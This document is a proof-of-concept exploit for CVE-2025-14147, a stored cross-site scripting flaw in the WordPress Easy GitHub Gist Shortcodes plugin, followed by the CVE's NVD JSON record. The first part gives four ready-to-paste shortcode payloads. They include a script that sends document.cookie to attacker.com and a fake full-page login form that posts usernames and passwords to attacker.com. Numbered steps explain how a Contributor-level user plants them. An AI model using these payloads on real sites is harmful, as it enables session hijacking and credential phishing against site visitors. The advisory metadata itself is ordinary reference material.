CVE-2025-14147

<!-- WordPress Easy GitHub Gist Shortcodes XSS PoC --> <!-- Author: Security Researcher --> <!-- CVE: CVE-2025-14147 --> <!-- 方法1: 通过WordPress短代码注入 --> [gist id='"><script>alert(document.domain)</script>'] <!-- 方法2: 绕过过滤的变体 --> [gist id='"><img src=x onerror=alert(1)>'] <!-- 方法3: Cookie窃取脚本 --> [gist id='"><script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'] <!-- 方法4: 持久化钓鱼表单 --> [gist id='"><div style="position:fixed;top:0;left:0;width:100%;height:100%;background:white;z-index:9999"><h1>Please Login Again</h1><form action="https://attacker.com/phish"><input name="username"><input name="password" type="password"><button>Login</button></form></div>'] <!-- 实际利用说明: 1. 攻击者需要WordPress Contributor+账户 2. 创建或编辑文章/页面 3. 插入上述恶意短代码之一 4. 发布文章 5. 任何访问该页面的用户都会执行注入的JavaScript -->

{"cve": {"id": "CVE-2025-14147", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:54.303", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Easy GitHub Gist Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter of the gist shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin Easy GitHub Gist Shortcodes para WordPress es vulnerable a cross-site scripting almacenado a través del parámetro 'id' del shortcode gist en todas las versiones hasta la 1.0, inclusive, debido a una sanitización de entrada y un escape de salida insuficientes. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/easy-github-gist-shortcodes/tags/1.0/easy-github-gist-shortcodes.php#L24", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/easy-github-gist-shortcodes/trunk/easy-github-gist-shortcodes.php#L24", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b117d77b-2c11-451c-b236-b55e8af68a9a?source=cve", "source": "[email protected]"}]}}